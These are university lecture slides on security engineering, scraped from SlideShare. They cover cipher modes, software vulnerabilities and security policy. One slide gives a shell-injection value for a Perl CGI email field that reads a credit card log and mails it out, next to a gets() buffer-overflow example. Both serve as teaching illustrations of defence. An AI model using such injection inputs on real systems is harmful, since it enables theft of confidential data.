SlideShare a Scribd company logo
Security Engineering

           Steven J. Murdoch



               Computer Laboratory



Based on Security I course by Markus Kuhn




                                            1
Computer Security / Information Security

   Definition
   Computer Security: the discipline of managing malicious intent and
   behaviour involving information and communication technology




                                                                        2
Computer Security / Information Security

   Definition
   Computer Security: the discipline of managing malicious intent and
   behaviour involving information and communication technology

   Malicious behaviour can include
       Fraud/theft – unauthorised access to money, goods or services
       Vandalism – causing damage for personal reasons (frustration, envy,
       revenge, curiosity, self esteem, peer recognition, . . . )
       Terrorism – causing damage, disruption and fear to intimidate
       Warfare – damaging military assets to overthrow a government
       Espionage – stealing information to gain competitive advantage
       Sabotage – causing damage to gain competitive advantage
       “Spam” – unsolicited marketing wasting time/resources
       Illegal content – child sexual abuse images, Nazi materials, . . .



                                                                             2
Computer Security / Information Security

   Definition
   Computer Security: the discipline of managing malicious intent and
   behaviour involving information and communication technology

   Malicious behaviour can include
       Fraud/theft – unauthorised access to money, goods or services
       Vandalism – causing damage for personal reasons (frustration, envy,
       revenge, curiosity, self esteem, peer recognition, . . . )
       Terrorism – causing damage, disruption and fear to intimidate
       Warfare – damaging military assets to overthrow a government
       Espionage – stealing information to gain competitive advantage
       Sabotage – causing damage to gain competitive advantage
       “Spam” – unsolicited marketing wasting time/resources
       Illegal content – child sexual abuse images, Nazi materials, . . .
   Security vs safety engineering: focus on intentional rather than
   accidental behaviour, presence of intelligent adversary.
                                                                             2
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment:




                                                                      3
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment: legal compliance, cash flow, business
       continuity, profitability, commercial image and shareholder
       confidence, product integrity, intellectual property and competitive
       advantage
       in a military environment:




                                                                             3
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment: legal compliance, cash flow, business
       continuity, profitability, commercial image and shareholder
       confidence, product integrity, intellectual property and competitive
       advantage
       in a military environment: exclusive access to and effectiveness of
       weapons, electronic countermeasures, communications secrecy,
       identification and location information, automated defences
       in a medical environment:




                                                                             3
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment: legal compliance, cash flow, business
       continuity, profitability, commercial image and shareholder
       confidence, product integrity, intellectual property and competitive
       advantage
       in a military environment: exclusive access to and effectiveness of
       weapons, electronic countermeasures, communications secrecy,
       identification and location information, automated defences
       in a medical environment: confidentiality and integrity of patient
       records, unhindered emergency access, equipment safety, correct
       diagnosis and treatment information
       in households:




                                                                             3
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment: legal compliance, cash flow, business
       continuity, profitability, commercial image and shareholder
       confidence, product integrity, intellectual property and competitive
       advantage
       in a military environment: exclusive access to and effectiveness of
       weapons, electronic countermeasures, communications secrecy,
       identification and location information, automated defences
       in a medical environment: confidentiality and integrity of patient
       records, unhindered emergency access, equipment safety, correct
       diagnosis and treatment information
       in households: PC, privacy, correct billing, burglar alarms
       in society at large:



                                                                             3
Where is information security a concern?

   Many organisations are today critically dependent on the flawless
   operation of computer systems. Without these, we might lose
       in a business environment: legal compliance, cash flow, business
       continuity, profitability, commercial image and shareholder
       confidence, product integrity, intellectual property and competitive
       advantage
       in a military environment: exclusive access to and effectiveness of
       weapons, electronic countermeasures, communications secrecy,
       identification and location information, automated defences
       in a medical environment: confidentiality and integrity of patient
       records, unhindered emergency access, equipment safety, correct
       diagnosis and treatment information
       in households: PC, privacy, correct billing, burglar alarms
       in society at large: utility services, communications, transport,
       tax/benefits collection, goods supply, . . .


                                                                             3
Common information security targets




   Most information-security concerns fall into three broad categories:

   Confidentiality ensuring that information is accessible only to those
                  authorised to have access
         Integrity safeguarding the accuracy and completeness of
                   information and processing methods
      Availability ensuring that authorised users have access to
                   information and associated assets when required




                                                                          4
Blockciphers

   Encryption is performed today typically with blockcipher algorithms,
   which are key-dependent permutations, operating on bit-block alphabets.
   Typical alphabet sizes: 264 or 2128

                       E : {0, 1}k × {0, 1}n → {0, 1}n

       Confusion – make relationship between key and ciphertext as
       complex as possible
       Diffusion – remove statistical links between plaintext and ciphertext
       Prevent adaptive chosen-plaintext attacks, including differential and
       linear cryptanalysis
       Product cipher: iterate many rounds of a weak pseudo-random
       permutation to get a strong one
       Feistel structure, substitution/permutation network, key-dependent
       s-boxes, mix incompatible groups, transpositions, linear
       transformations, arithmetic operations, substitutions, . . .

                                                                              5
Block cipher standards


   In 1977, the US government standardized a block cipher for unclassified
   data, based on a proposal by an IBM team led by Horst Feistel.
   DES has a block size of 64 bits and a key size of 56 bits. The relatively
   short key size and its limited protection against brute-force key searches
   immediately triggered criticism, but this did not prevent DES from
   becoming the most commonly used cipher for banking networks and
   numerous other applications for more than 25 years.




                                                                                6
Block cipher standards


   In 1977, the US government standardized a block cipher for unclassified
   data, based on a proposal by an IBM team led by Horst Feistel.
   DES has a block size of 64 bits and a key size of 56 bits. The relatively
   short key size and its limited protection against brute-force key searches
   immediately triggered criticism, but this did not prevent DES from
   becoming the most commonly used cipher for banking networks and
   numerous other applications for more than 25 years.

   In November 2001, the US government published the new Advanced
   Encryption Standard (AES), the official DES successor with 128-bit block
   size and either 128, 192 or 256 bit key length. It adopted the “Rijndael”
   cipher designed by Joan Daemen and Vincent Rijmen, which offers
   additional block/key size combinations.
   Recent CPUs with AES hardware support: Intel/AMD x86 AES-NI instructions, VIA PadLock.




                                                                                            6
Electronic Code Book (ECB)

                       P1             P2                      Pn




                      EK              EK          ···         EK




                       C1             C2                      Cn

   In the simplest mode of operation standardised for DES, AES, and
   other block ciphers, the message is cut into n m-bit blocks, where m is
   the block size of the cipher, and then the cipher function is applied to
   each block individually.
   http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf



                                                                              7
Plain-text bitmap:




DES-ECB encrypted:




                     8
Cipher Block Chaining (CBC)

                              P1            P2                   Pn

                              ⊕             ⊕                    ⊕

         RND                  EK            EK        ···        EK




            C0                C1            C2                   Cn
        initial vector




                         Pi        ⊕   EK                   Ci


                               Ci = EK (Pi ⊕ Ci−1 )
                                                                      9
Plain-text bitmap:




DES-CBC encrypted:




                     10
ScatterChat




              11
Putting it together: EMV




                           12
Putting it together: EMV




                           13
Common software vulnerabilities

         Missing checks for data size (→ stack buffer overflow)
         Missing checks for data content (e.g., shell meta characters)
         Missing checks for boundary conditions
         Missing checks for success/failure of operations
         Missing locks – insufficient serialisation
         Race conditions – time of check to time of use
         Incomplete checking of environment
         Unexpected side channels (timing, etc.)
         Lack of authentication
   The “curses of security” (Gollmann): change, complacency, convenience
   (software reuse for inappropriate purposes, too large TCB, etc.)

   C.E. Landwehr, et al.: A taxonomy of computer program security flaws, with examples.
   ACM Computing Surveys 26(3), September 1994.
   http://dx.doi.org/10.1145/185403.185412



                                                                                         14
Example for a missing check of data size


   A C program declares a local short string variable
     char buffer[80];
   and then uses the standard C library routine call
     gets(buffer);
   to read a single text line from standard input and save it into buffer.
   This works fine for normal-length lines but corrupts the stack if the input
   is longer than 79 characters. Attacker loads malicious code into buffer
   and redirects return address to its start:

   Memory:        Program        Data   Heap            free          Stack

   Stack:      . . . ? buffer[80]            FP RET            Parameters
                                                                   -        ...




                                                                                  15
Example for missing check of input data

   A web server allows users to provide an email address in a form field to
   receive a file. The address is received by a na¨
                                                 ıvely implemented Perl CGI
   script and stored in the variable $email. The CGI script then attempts
   to send out the email with the command
      system("mail $email <message");
   This works fine as long as $email contains only a normal email address,
   free of shell meta-characters. An attacker provides a carefully selected
   pathological address such as
    trustno1@hotmail.com < /var/db/creditcards.log ; echo
   and executes arbitrary commands (here to receive confidential data via
   email). The solution requires that each character with special meaning
   handed over to another software is prefixed with a suitable escape symbol
   (e.g.,  or ’...’ in the case of the Unix shell). This requires a detailed
   understanding of the recipient’s complete syntax.
   Checks for meta characters are also frequently forgotten for text that is passed on to SQL engines,
   embedded into HTML pages, etc.



                                                                                                         16
Integer overflows


   Integer numbers in computers behave differently from integer numbers in
   mathematics. For an unsigned 8-bit integer value, we have
     255 + 1 == 0
       0 - 1 == 255
     16 * 17 == 16
   and likewise for a signed 8-bit value, we have
       127 + 1 == -128
     -128 / -1 == -128
   And what looks like an obvious endless loop
     int i = 1;
     while (i > 0)
       i = i * 2;
   terminates after 15, 31, or 63 steps (depending on the register size).



                                                                            17
Security Management and Engineering I




   “Is this product/technique/service secure?”

   Simple Yes/No answers are often wanted, but typically inappropriate.
   Security of an item depends much on the context in which it is used.
   Complex systems can provide a very large number of elements and
   interactions that are open to abuse. An effective protection can therefore
   only be obtained as the result of a systematic planning approach.




                                                                               18
Security Management and Engineering II
      “No need to worry, our product is 100% secure. All data is
     encrypted with 128-bit keys. It takes billions of years to break
                                these.”
   Such statements are abundant in marketing literature. A security
   manager should ask:
       What does the mechanism achieve?
       Do we need confidentiality, integrity or availability of exactly this
       data?
       Who will generate the keys and how?
       Who will store / have access to the keys?
       Can we lose keys and with them data?
       Will it interfere with other security measures (backup, auditing,
       scanning, . . . )?
       Will it introduce new vulnerabilities or can it somehow be used
       against us?
       What if it breaks or is broken?
       ...
                                                                              19
Security policy development

   Step 1: Security requirements analysis
       Identify assets and their value
       Identify vulnerabilities, threats and risk priorities
       Identify legal and contractual requirements


   Step 2: Work out a suitable security policy
   The security requirements identified can be complex and may have to be
   abstracted first into a high-level security policy, a set of rules that
   clarifies which are or are not authorised, required, and prohibited
   activities, states and information flows.
   Security policy models are techniques for the precise and even formal
   definition of such protection goals. They can describe both automatically
   enforced policies (e.g., a mandatory access control configuration in an
   operating system, a policy description language for a database management
   system, etc.) and procedures for employees (e.g., segregation of duties).

                                                                               20
Step 3: Security policy document
Once a good understanding exists of what exactly security means for an
organisation and what needs to be protected or enforced, the high-level
security policy should be documented as a reference for anyone involved
in implementing controls. It should clearly lay out the overall objectives,
principles and the underlying threat model that are to guide the choice of
mechanisms in the next step.

Step 4: Selection and implementation of controls
Issues addressed in a typical low-level organisational security policy:
     General (affecting everyone) and specific responsibilities for security
     Names manager who “owns” the overall policy and is in charge of its
     continued enforcement, maintenance, review, and evaluation of
     effectiveness
     Names individual managers who “own” individual information assets and
     are responsible for their day-to-day security
     Reporting responsibilities for security incidents, vulnerabilities, software
     malfunctions
     Mechanisms for learning from incidents
                                                                                    21
Incentives, disciplinary process, consequences of policy violations
User training, documentation and revision of procedures
Personnel security (depending on sensitivity of job)
Background checks, supervision, confidentiality agreement

Regulation of third-party access
Physical security
Definition of security perimeters, locating facilities to minimise traffic across perimeters,
alarmed fire doors, physical barriers that penetrate false floors/ceilings, entrance controls,
handling of visitors and public access, visible identification, responsibility to challenge
unescorted strangers, location of backup equipment at safe distance, prohibition of recording
equipment, redundant power supplies, access to cabling, authorisation procedure for removal
of property, clear desk/screen policy, etc.

Segregation of duties
Avoid that a single person can abuse authority without detection (e.g., different people must
raise purchase order and confirm delivery of goods, croupier vs. cashier in casino)

Audit trails
What activities are logged, how are log files protected from manipulation

Separation of development and operational facilities
Protection against unauthorised and malicious software


                                                                                                22
Organising backup and rehearsing restoration
     File/document access control, sensitivity labeling of documents and media
     Disposal of media
     Zeroise, degauss, reformat, or shred and destroy storage media, paper, carbon paper, printer
     ribbons, etc. before discarding it.

     Network and software configuration management
     Line and file encryption, authentication, key and password management
     Duress alarms, terminal timeouts, clock synchronisation, . . .

For more detailed check lists and guidelines for writing informal security policy
documents along these lines, see for example

     British Standard 7799 “Code of practice for information security
     management”
     German Information Security Agency’s “IT Baseline Protection Manual”
     http://www.bsi.bund.de/english/gshb/manual/
     US DoD National Computer Security Center Rainbow Series, for military
     policy guidelines
     http://en.wikipedia.org/wiki/Rainbow_Series


                                                                                                    23

More Related Content

What's hot

Ec2009 ch10 e commerce security
Ec2009 ch10 e commerce securityEc2009 ch10 e commerce security
Ec2009 ch10 e commerce security
Nuth Otanasap
 
E-Commerce Security
E-Commerce SecurityE-Commerce Security
E-Commerce Security
Syed Maniruzzaman Pabel
 
Cehv6 module 01 introduction to ethical hacking
Cehv6 module 01 introduction to ethical hackingCehv6 module 01 introduction to ethical hacking
Cehv6 module 01 introduction to ethical hacking
anonymousrider
 
Isaca june 19, 2010
Isaca june 19, 2010Isaca june 19, 2010
Isaca june 19, 2010Vicky Shah
 
E business security
E business securityE business security
E business security
Sameer Sharma
 
Cryptography summary
Cryptography summaryCryptography summary
Cryptography summary
Ni
 
Security issue in e commerce
Security issue in e commerceSecurity issue in e commerce
Module 3-cyber security
Module 3-cyber securityModule 3-cyber security
Module 3-cyber security
Sweta Kumari Barnwal
 
Information cyber security
Information cyber securityInformation cyber security
Information cyber security
SumanPramanik7
 
Web Application Security Session for Web Developers
Web Application Security Session for Web DevelopersWeb Application Security Session for Web Developers
Web Application Security Session for Web Developers
Krishna Srikanth Manda
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
Dumindu Pahalawatta
 
Security in E-commerce
Security in E-commerceSecurity in E-commerce
Security in E-commercem8817
 
Chapter three e-security
Chapter three e-securityChapter three e-security
Chapter three e-security
Marya Sholevar
 
6 e commerce security
6 e commerce security6 e commerce security
6 e commerce security
Naveed Ahmed Siddiqui
 
Cybersecurity
CybersecurityCybersecurity
E commerce security
E commerce securityE commerce security
E commerce securityShakti Singh
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
chakrekevin
 
Unit ii-hackers and cyber crimes
Unit ii-hackers and cyber crimesUnit ii-hackers and cyber crimes
Unit ii-hackers and cyber crimes
Sweta Kumari Barnwal
 
Hackers and cyber crimes
Hackers and cyber crimesHackers and cyber crimes
Hackers and cyber crimes
Sweta Kumari Barnwal
 

What's hot (20)

Ec2009 ch10 e commerce security
Ec2009 ch10 e commerce securityEc2009 ch10 e commerce security
Ec2009 ch10 e commerce security
 
E-Commerce Security
E-Commerce SecurityE-Commerce Security
E-Commerce Security
 
Cehv6 module 01 introduction to ethical hacking
Cehv6 module 01 introduction to ethical hackingCehv6 module 01 introduction to ethical hacking
Cehv6 module 01 introduction to ethical hacking
 
Isaca june 19, 2010
Isaca june 19, 2010Isaca june 19, 2010
Isaca june 19, 2010
 
E business security
E business securityE business security
E business security
 
Cryptography summary
Cryptography summaryCryptography summary
Cryptography summary
 
Security issue in e commerce
Security issue in e commerceSecurity issue in e commerce
Security issue in e commerce
 
Module 3-cyber security
Module 3-cyber securityModule 3-cyber security
Module 3-cyber security
 
Information cyber security
Information cyber securityInformation cyber security
Information cyber security
 
Web Application Security Session for Web Developers
Web Application Security Session for Web DevelopersWeb Application Security Session for Web Developers
Web Application Security Session for Web Developers
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
 
Security in E-commerce
Security in E-commerceSecurity in E-commerce
Security in E-commerce
 
Chapter three e-security
Chapter three e-securityChapter three e-security
Chapter three e-security
 
6 e commerce security
6 e commerce security6 e commerce security
6 e commerce security
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Cybersecurity
CybersecurityCybersecurity
Cybersecurity
 
E commerce security
E commerce securityE commerce security
E commerce security
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Unit ii-hackers and cyber crimes
Unit ii-hackers and cyber crimesUnit ii-hackers and cyber crimes
Unit ii-hackers and cyber crimes
 
Hackers and cyber crimes
Hackers and cyber crimesHackers and cyber crimes
Hackers and cyber crimes
 

Viewers also liked

Introduction to Digital Signal Processing
Introduction to Digital Signal ProcessingIntroduction to Digital Signal Processing
Introduction to Digital Signal Processing
op205
 
Brief Review of Fourier Analysis
Brief Review of Fourier AnalysisBrief Review of Fourier Analysis
Brief Review of Fourier Analysis
op205
 
Digital Signal Processing Summary
Digital Signal Processing SummaryDigital Signal Processing Summary
Digital Signal Processing Summary
op205
 
3 f6 9_distributed_systems
3 f6 9_distributed_systems3 f6 9_distributed_systems
3 f6 9_distributed_systemsop205
 
Basics of Analogue Filters
Basics of Analogue FiltersBasics of Analogue Filters
Basics of Analogue Filters
op205
 
Implementation of Digital Filters
Implementation of Digital FiltersImplementation of Digital Filters
Implementation of Digital Filters
op205
 
Design of IIR filters
Design of IIR filtersDesign of IIR filters
Design of IIR filters
op205
 
Basics of Digital Filters
Basics of Digital FiltersBasics of Digital Filters
Basics of Digital Filters
op205
 
Design of FIR filters
Design of FIR filtersDesign of FIR filters
Design of FIR filters
op205
 
Sound and hearing by mairasadiq
Sound and hearing by mairasadiqSound and hearing by mairasadiq
Sound and hearing by mairasadiqmairasadiq
 
Lecture 6 Software Engineering and Design Good Design
Lecture 6 Software Engineering and Design Good Design Lecture 6 Software Engineering and Design Good Design
Lecture 6 Software Engineering and Design Good Design
op205
 
Lecture 7 Software Engineering and Design User Interface Design
Lecture 7 Software Engineering and Design User Interface Design Lecture 7 Software Engineering and Design User Interface Design
Lecture 7 Software Engineering and Design User Interface Design
op205
 
DIGITAL SIGNAL PROCESSING
DIGITAL SIGNAL PROCESSINGDIGITAL SIGNAL PROCESSING
DIGITAL SIGNAL PROCESSING
Snehal Hedau
 
More on DFT
More on DFTMore on DFT
More on DFT
op205
 
Fast Fourier Transform
Fast Fourier TransformFast Fourier Transform
Fast Fourier Transform
op205
 
3 f6 11_softdevmethodologies
3 f6 11_softdevmethodologies3 f6 11_softdevmethodologies
3 f6 11_softdevmethodologiesop205
 
3F3 – Digital Signal Processing (DSP) - Part1
3F3 – Digital Signal Processing (DSP) - Part13F3 – Digital Signal Processing (DSP) - Part1
3F3 – Digital Signal Processing (DSP) - Part1
op205
 
Time frequency analysis_journey
Time frequency analysis_journeyTime frequency analysis_journey
Time frequency analysis_journey
Chandrashekhar Padole
 
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR)
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR) Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR)
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR) Chandrashekhar Padole
 
Dct and adaptive filters
Dct and adaptive filtersDct and adaptive filters
Dct and adaptive filters
GIET,Bhubaneswar
 

Viewers also liked (20)

Introduction to Digital Signal Processing
Introduction to Digital Signal ProcessingIntroduction to Digital Signal Processing
Introduction to Digital Signal Processing
 
Brief Review of Fourier Analysis
Brief Review of Fourier AnalysisBrief Review of Fourier Analysis
Brief Review of Fourier Analysis
 
Digital Signal Processing Summary
Digital Signal Processing SummaryDigital Signal Processing Summary
Digital Signal Processing Summary
 
3 f6 9_distributed_systems
3 f6 9_distributed_systems3 f6 9_distributed_systems
3 f6 9_distributed_systems
 
Basics of Analogue Filters
Basics of Analogue FiltersBasics of Analogue Filters
Basics of Analogue Filters
 
Implementation of Digital Filters
Implementation of Digital FiltersImplementation of Digital Filters
Implementation of Digital Filters
 
Design of IIR filters
Design of IIR filtersDesign of IIR filters
Design of IIR filters
 
Basics of Digital Filters
Basics of Digital FiltersBasics of Digital Filters
Basics of Digital Filters
 
Design of FIR filters
Design of FIR filtersDesign of FIR filters
Design of FIR filters
 
Sound and hearing by mairasadiq
Sound and hearing by mairasadiqSound and hearing by mairasadiq
Sound and hearing by mairasadiq
 
Lecture 6 Software Engineering and Design Good Design
Lecture 6 Software Engineering and Design Good Design Lecture 6 Software Engineering and Design Good Design
Lecture 6 Software Engineering and Design Good Design
 
Lecture 7 Software Engineering and Design User Interface Design
Lecture 7 Software Engineering and Design User Interface Design Lecture 7 Software Engineering and Design User Interface Design
Lecture 7 Software Engineering and Design User Interface Design
 
DIGITAL SIGNAL PROCESSING
DIGITAL SIGNAL PROCESSINGDIGITAL SIGNAL PROCESSING
DIGITAL SIGNAL PROCESSING
 
More on DFT
More on DFTMore on DFT
More on DFT
 
Fast Fourier Transform
Fast Fourier TransformFast Fourier Transform
Fast Fourier Transform
 
3 f6 11_softdevmethodologies
3 f6 11_softdevmethodologies3 f6 11_softdevmethodologies
3 f6 11_softdevmethodologies
 
3F3 – Digital Signal Processing (DSP) - Part1
3F3 – Digital Signal Processing (DSP) - Part13F3 – Digital Signal Processing (DSP) - Part1
3F3 – Digital Signal Processing (DSP) - Part1
 
Time frequency analysis_journey
Time frequency analysis_journeyTime frequency analysis_journey
Time frequency analysis_journey
 
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR)
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR) Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR)
Digital Signal Processing Tutorial: Chapt 4 design of digital filters (FIR)
 
Dct and adaptive filters
Dct and adaptive filtersDct and adaptive filters
Dct and adaptive filters
 

Similar to 3 f6 security

Information security
Information securityInformation security
Information security
Onkar Sule
 
Chapter 8 securing information systems MIS
Chapter 8 securing information systems MISChapter 8 securing information systems MIS
Chapter 8 securing information systems MIS
Amirul Shafiq Ahmad Zuperi
 
cyber security presentation.pptx
cyber security presentation.pptxcyber security presentation.pptx
cyber security presentation.pptx
kishore golla
 
Human_Factors_KA_webinar_-_slides.pptx
Human_Factors_KA_webinar_-_slides.pptxHuman_Factors_KA_webinar_-_slides.pptx
Human_Factors_KA_webinar_-_slides.pptx
Muddasarahmed5
 
Chapter 1 - Introduction.pdf
Chapter 1 - Introduction.pdfChapter 1 - Introduction.pdf
Chapter 1 - Introduction.pdf
EthioDotNetDeveloper
 
Information Systems.pptx
Information Systems.pptxInformation Systems.pptx
Information Systems.pptx
KnownId
 
Information Security : Is it an Art or a Science
Information Security : Is it an Art or a ScienceInformation Security : Is it an Art or a Science
Information Security : Is it an Art or a Science
Pankaj Rane
 
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
Andris Soroka
 
Top Cyber Security Interview Questions and Answers 2022.pdf
Top Cyber Security Interview Questions and Answers 2022.pdfTop Cyber Security Interview Questions and Answers 2022.pdf
Top Cyber Security Interview Questions and Answers 2022.pdf
Careerera
 
Lecture 1-2.pdf
Lecture 1-2.pdfLecture 1-2.pdf
Lecture 1-2.pdf
FumikageTokoyami4
 
Cyber Security Matters a book by Hama David Bundo
Cyber Security Matters a book by Hama David BundoCyber Security Matters a book by Hama David Bundo
Cyber Security Matters a book by Hama David Bundo
hdbundo
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
Ramiro Cid
 
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
IBM Security
 
C018131821
C018131821C018131821
C018131821
IOSR Journals
 
Introduction to security
Introduction to securityIntroduction to security
Introduction to security
Mukesh Chinta
 
American Bar Association guidelines on Cyber Security standards
American Bar Association guidelines on Cyber Security standardsAmerican Bar Association guidelines on Cyber Security standards
American Bar Association guidelines on Cyber Security standards
David Sweigert
 
It seminar isr
It seminar isrIt seminar isr
It seminar isrASNA p.a
 
IT8073_Information Security_UNIT I _.pdf
IT8073_Information Security_UNIT I _.pdfIT8073_Information Security_UNIT I _.pdf
IT8073_Information Security_UNIT I _.pdf
Asst.prof M.Gokilavani
 
IT8073 _Information Security _UNIT I Full notes
IT8073 _Information Security _UNIT I Full notesIT8073 _Information Security _UNIT I Full notes
IT8073 _Information Security _UNIT I Full notes
Asst.prof M.Gokilavani
 
Clinton- Cyber IRT Balto 10_2012
Clinton- Cyber IRT Balto 10_2012Clinton- Cyber IRT Balto 10_2012
Clinton- Cyber IRT Balto 10_2012
Don Grauel
 

Similar to 3 f6 security (20)

Information security
Information securityInformation security
Information security
 
Chapter 8 securing information systems MIS
Chapter 8 securing information systems MISChapter 8 securing information systems MIS
Chapter 8 securing information systems MIS
 
cyber security presentation.pptx
cyber security presentation.pptxcyber security presentation.pptx
cyber security presentation.pptx
 
Human_Factors_KA_webinar_-_slides.pptx
Human_Factors_KA_webinar_-_slides.pptxHuman_Factors_KA_webinar_-_slides.pptx
Human_Factors_KA_webinar_-_slides.pptx
 
Chapter 1 - Introduction.pdf
Chapter 1 - Introduction.pdfChapter 1 - Introduction.pdf
Chapter 1 - Introduction.pdf
 
Information Systems.pptx
Information Systems.pptxInformation Systems.pptx
Information Systems.pptx
 
Information Security : Is it an Art or a Science
Information Security : Is it an Art or a ScienceInformation Security : Is it an Art or a Science
Information Security : Is it an Art or a Science
 
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
2015 Cyber security solutions vs cyber criminals @WOHIT2015 (EU eHealth week)
 
Top Cyber Security Interview Questions and Answers 2022.pdf
Top Cyber Security Interview Questions and Answers 2022.pdfTop Cyber Security Interview Questions and Answers 2022.pdf
Top Cyber Security Interview Questions and Answers 2022.pdf
 
Lecture 1-2.pdf
Lecture 1-2.pdfLecture 1-2.pdf
Lecture 1-2.pdf
 
Cyber Security Matters a book by Hama David Bundo
Cyber Security Matters a book by Hama David BundoCyber Security Matters a book by Hama David Bundo
Cyber Security Matters a book by Hama David Bundo
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
Encryption and Key Management: Ensuring Compliance, Privacy, and Minimizing t...
 
C018131821
C018131821C018131821
C018131821
 
Introduction to security
Introduction to securityIntroduction to security
Introduction to security
 
American Bar Association guidelines on Cyber Security standards
American Bar Association guidelines on Cyber Security standardsAmerican Bar Association guidelines on Cyber Security standards
American Bar Association guidelines on Cyber Security standards
 
It seminar isr
It seminar isrIt seminar isr
It seminar isr
 
IT8073_Information Security_UNIT I _.pdf
IT8073_Information Security_UNIT I _.pdfIT8073_Information Security_UNIT I _.pdf
IT8073_Information Security_UNIT I _.pdf
 
IT8073 _Information Security _UNIT I Full notes
IT8073 _Information Security _UNIT I Full notesIT8073 _Information Security _UNIT I Full notes
IT8073 _Information Security _UNIT I Full notes
 
Clinton- Cyber IRT Balto 10_2012
Clinton- Cyber IRT Balto 10_2012Clinton- Cyber IRT Balto 10_2012
Clinton- Cyber IRT Balto 10_2012
 

More from op205

3 f6 8_databases
3 f6 8_databases3 f6 8_databases
3 f6 8_databasesop205
 
3 f6 10_testing
3 f6 10_testing3 f6 10_testing
3 f6 10_testingop205
 
3 f6 9a_corba
3 f6 9a_corba3 f6 9a_corba
3 f6 9a_corbaop205
 
3 f6 9a_corba
3 f6 9a_corba3 f6 9a_corba
3 f6 9a_corbaop205
 
Lecture 5 Software Engineering and Design Design Patterns
Lecture 5 Software Engineering and Design Design PatternsLecture 5 Software Engineering and Design Design Patterns
Lecture 5 Software Engineering and Design Design Patterns
op205
 
Lecture 4 Software Engineering and Design Brief Introduction to Programming
Lecture 4 Software Engineering and Design Brief Introduction to ProgrammingLecture 4 Software Engineering and Design Brief Introduction to Programming
Lecture 4 Software Engineering and Design Brief Introduction to Programming
op205
 
Lecture 3 Software Engineering and Design Introduction to UML
Lecture 3 Software Engineering and Design Introduction to UMLLecture 3 Software Engineering and Design Introduction to UML
Lecture 3 Software Engineering and Design Introduction to UML
op205
 
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
op205
 
Lecture 1 Software Engineering and Design Introduction
Lecture 1 Software Engineering and Design Introduction Lecture 1 Software Engineering and Design Introduction
Lecture 1 Software Engineering and Design Introduction
op205
 

More from op205 (9)

3 f6 8_databases
3 f6 8_databases3 f6 8_databases
3 f6 8_databases
 
3 f6 10_testing
3 f6 10_testing3 f6 10_testing
3 f6 10_testing
 
3 f6 9a_corba
3 f6 9a_corba3 f6 9a_corba
3 f6 9a_corba
 
3 f6 9a_corba
3 f6 9a_corba3 f6 9a_corba
3 f6 9a_corba
 
Lecture 5 Software Engineering and Design Design Patterns
Lecture 5 Software Engineering and Design Design PatternsLecture 5 Software Engineering and Design Design Patterns
Lecture 5 Software Engineering and Design Design Patterns
 
Lecture 4 Software Engineering and Design Brief Introduction to Programming
Lecture 4 Software Engineering and Design Brief Introduction to ProgrammingLecture 4 Software Engineering and Design Brief Introduction to Programming
Lecture 4 Software Engineering and Design Brief Introduction to Programming
 
Lecture 3 Software Engineering and Design Introduction to UML
Lecture 3 Software Engineering and Design Introduction to UMLLecture 3 Software Engineering and Design Introduction to UML
Lecture 3 Software Engineering and Design Introduction to UML
 
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
Lecture 2 Software Engineering and Design Object Oriented Programming, Design...
 
Lecture 1 Software Engineering and Design Introduction
Lecture 1 Software Engineering and Design Introduction Lecture 1 Software Engineering and Design Introduction
Lecture 1 Software Engineering and Design Introduction
 

Recently uploaded

JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
GraphRAG is All You need? LLM & Knowledge Graph
